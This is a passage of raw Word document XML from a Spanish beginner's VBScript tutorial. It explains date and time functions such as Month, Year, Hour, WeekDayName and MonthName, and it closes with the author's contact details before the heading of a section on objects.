            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:b/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>numero 2</w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> es una constante que indica que el primer día de la semana es el lunes, no se debe omitir y no es necesario modificarlo (si pones 1 el primer día es domingo, etc).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:ind w:left="93" w:right="164"/>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tercera función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Month</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función hace que la función Now devuelva un número entero entre 1 y 12, inclusive, que representa </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">el mes del año. Es decir, si estamos a 23 de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Marzo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, esta función dará el valor 3 mientras que si estamos en Junio, el valor que devolverá será 6:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8617" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2496"/>
        <w:gridCol w:w="6121"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="357"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2496"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Month(</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6121"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mes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="42"/>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cuarta función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Year</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Esta función hace que la función Now devuelva un número entero de cuatro cifras, que representa el año. Un ejemplo de uso de esta función es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8389" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2310"/>
        <w:gridCol w:w="6079"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="357"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2310"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Year(</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607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año.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="42"/>
        <w:ind w:left="93" w:right="16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quinta función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Hour</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Esta función hace que la función Now devuelva un número entero entre 0 y 23, inclusive, que representa la hora del día. Un ejemplo de uso de esta función es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8675" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2350"/>
        <w:gridCol w:w="6325"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="357"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2350"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Hour(</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6325"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 la hora.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="42"/>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xta función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Minute</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Esta función hace que la función Now devuelva un número entero entre 0 y 59, inclusive, que representa el minuto de una hora. Un ejemplo de uso de esta función es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8701" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3844"/>
        <w:gridCol w:w="4857"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="633"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="384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Minute(</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485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minuto.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="4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éptima función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Second</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Esta función hace que la función Now devuelva un número entero entre 0 y 59, inclusive, que representa el segundo de un minuto. Un ejemplo de uso de esta función es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8701" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3844"/>
        <w:gridCol w:w="4857"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="633"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="384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Second(</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485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segundo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="4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octava función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>WeekDayName</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Esta función hace que la función Now devuelva una</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> cadena en minúsculas </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">con el nombre de la semana. Esta función va acompañada siempre de la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>WeekDay.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> La palabra False indica que guarda el nombre completo, si pones True guardará solo las tres primeras letras. El número 2 tiene la misma función que el 2 de la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">WeekDay. </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Un ejemplo de uso de esta función es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8701" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4822"/>
        <w:gridCol w:w="3879"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="909"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4822"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WeekDayName(WeekDay(</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 xml:space="preserve">,2),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False, 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="387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right="17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obtiene el valor </w:t>
            </w:r>
            <w:r w:rsidRPr="006C0511">
              <w:rPr>
                <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>correspondiente al nombre del dia de la semana.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="21"/>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La novena función es </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>MonthName</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Esta función hace que la función Now devuelva una </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">cadena en minúsculas </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">con el nombre del mes. Esta función va acompañada siempre de la función </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Month.</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> La palabra False indica que guarda el nombre completo, si pones True guardará solo las tres primeras letras. Un ejemplo de uso de esta función es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8391" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4602"/>
        <w:gridCol w:w="3789"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="633"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4602"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MonthName(Month(</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 False)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="378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nombre del mes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="4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s últimas funciones son </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Tim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i/>
          <w:u w:val="single" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Date</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Estas funciones actúan de forma independiente y devuelven, la primera la hora, el minuto y el segundo; y la segunda, el mes, año y día. Estas pueden sustituir al </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Now</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> pero es recomendable usar antes el Now que estas. Estas solo se utilizan para mostrar mensajes o con todos los datos de la hora o con la fecha entera. Un ejemplo de uso de estas funciones es el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="8701" w:type="dxa"/>
        <w:tblInd w:w="-5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="48" w:type="dxa"/>
          <w:left w:w="1" w:type="dxa"/>
          <w:right w:w="9" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3084"/>
        <w:gridCol w:w="5617"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
        <w:trPr>
          <w:trHeight w:val="1185"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3084"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Date</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Time</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3 = Variable&amp;"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mp;Variable2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="561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de la fecha.</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obtiene el valor de la hora.</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3 obtiene los dos valores juntos que equivalen a la función Now.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>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bueno, esto es todo en cuanto a funciones de tiempo se refiere, aunque creo que son suficientes para darnos un control sobre el tiempo bastante grande. Recomiendo de nuevo practicar y repasar todo lo visto hasta ahora, ya que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 puede mostrar los resultados en pantalla. Por otro lado, he obviado la creación de variables en todos los ejemplos, pero no vendría mal que volvieras a ver el uso del </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Option Explicit</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y el </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Dim</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:ind w:left="93" w:right="160"/>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Y</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> por último, de este Tutorial de introducción decir que ya se pueden hacer muchas cosas, que practiquéis y que lo aprendáis todo bien antes de continuar con la segunda parte: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:b/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>El Uso de los Objetos en VBscript</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, pues daré todo esto por sabido y aprendid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lo olvides, para dudas o consultas escribe a: </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single" w:color="0000FF"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>scswinter@hotmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:spacing w:after="140" w:line="259"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O bien visita: </w:t>
      </w:r>
      <w:hyperlink r:id="rId31">
        <w:r w:rsidRPr="006C0511">
          <w:rPr>
            <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single" w:color="0000FF"/>
            <w:lang w:val="es-ES"/>
          </w:rPr>
          <w:t>http://scswinter.110mb.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00E62AD2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:sectPr w:rsidR="00E62AD2" w:rsidRPr="006C0511">
          <w:headerReference w:type="even" r:id="rId32"/>
          <w:headerReference w:type="default" r:id="rId33"/>
          <w:footerReference w:type="even" r:id="rId34"/>
          <w:footerReference w:type="default" r:id="rId35"/>
          <w:headerReference w:type="first" r:id="rId36"/>
          <w:footerReference w:type="first" r:id="rId37"/>
          <w:pgSz w:w="11900" w:h="16840"/>
          <w:pgMar w:top="1418" w:right="1534" w:bottom="1450" w:left="1606" w:header="708" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="222"/>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Programación con Objetos en </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E62AD2" w:rsidRPr="006C0511" w:rsidRDefault="00822E99">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="3" w:space="0" w:color="000000"/>
          <w:bottom w:val="single" w:sz="3" w:space="0" w:color="000000"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
        <w:spacing w:after="610" w:line="270" w:lineRule="auto"/>
        <w:ind w:left="222"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0511">
        <w:rPr>
          <w:rFonts w:ascii="BIZ UDPMincho Medium" w:eastAsia="BIZ UDPMincho Medium" w:hAnsi="BIZ UDPMincho Medium" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="56"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Visual Basic Script</w:t>
      </w:r>
    </w:p>
